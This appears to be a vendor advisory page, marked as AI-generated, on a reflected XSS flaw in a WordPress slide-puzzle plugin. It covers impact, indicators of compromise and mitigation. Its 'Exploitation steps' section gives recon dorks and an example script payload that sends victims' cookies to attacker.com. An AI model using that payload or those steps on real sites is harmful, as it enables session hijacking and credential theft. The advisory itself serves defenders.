CVE-2025-52751
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-52751 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WordPress "Slide Puzzle" plugin by developer colome. It affects all versions up to and including 1.0.0, with no official patch currently available. The vulnerability was reported by researcher Nguyen Xuan Chien on July 18, 2025, and published by Patchstack on August 17, 2025, with CVE assignment on October 22, 2025. It carries a CVSS v3.1 base score of 7.1 (High), as assessed by CISA-ADP (Patchstack, Patchstack VDP).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Reflected XSS variant. The plugin fails to properly sanitize or encode user-supplied input before reflecting it back in the generated web page, allowing an attacker to inject malicious scripts via crafted URLs or parameters. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — a victim must click a malicious link or visit a crafted page. The scope is changed, meaning the injected script executes in the context of the victim's browser session on the affected WordPress site (Patchstack VDP).

Impact

Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the victim's browser within the context of the affected WordPress site. This can lead to session hijacking, credential theft, redirection to malicious sites, defacement of page content, or delivery of malware to site visitors. The CVSS assessment indicates low confidentiality, integrity, and availability impact with a changed scope, meaning the attack can affect resources beyond the vulnerable component itself (Patchstack VDP).

Exploitability

No public proof-of-concept exploit code has been identified at this time, and there is no evidence of active in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting WordPress sites regardless of their size or popularity (Patchstack VDP).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Slide Puzzle plugin (version <= 1.0.0) using tools like WPScan, Shodan, or Google dorks targeting the plugin's known file paths (e.g., inurl:/wp-content/plugins/slide-puzzle/).
  2. Identify vulnerable parameter: Analyze the plugin's front-end functionality to locate URL parameters or form inputs that are reflected unsanitized in the server's HTML response.
  3. Craft malicious payload: Construct a URL containing a reflected XSS payload in the vulnerable parameter, e.g., https://target-site.com/?slide_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver the payload: Send the crafted URL to a target victim (e.g., a WordPress administrator) via phishing email, social engineering, or by embedding it in a malicious page.
  5. Achieve objective: When the victim clicks the link and loads the page, the injected script executes in their browser, enabling session cookie theft, credential harvesting, or further malicious actions (Patchstack VDP).

Indicators of compromise

  • Network: HTTP GET requests to WordPress pages with the Slide Puzzle plugin containing encoded or raw script tags (<script>, %3Cscript%3E) or JavaScript event handlers in URL parameters; outbound requests from victim browsers to unknown external domains shortly after loading plugin pages.
  • Logs: WordPress or web server access logs showing requests to plugin-related endpoints with suspicious query strings containing HTML/JavaScript payloads; repeated requests from varying IPs with similar XSS payload patterns.
  • File System: No direct file system artifacts expected for reflected XSS; however, if an attacker escalates access, watch for new or modified PHP files in /wp-content/plugins/slide-puzzle/ or other plugin directories.

Mitigation and workarounds

As of the time of publication, no official patch is available for the Slide Puzzle plugin (versions <= 1.0.0). The recommended immediate action is to deactivate and remove the plugin until a patched version is released. Patchstack has issued a virtual patching/mitigation rule for its subscribers to block exploitation attempts in the interim. Site administrators should also implement a Web Application Firewall (WAF) with XSS filtering rules as an additional layer of defense (Patchstack VDP).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management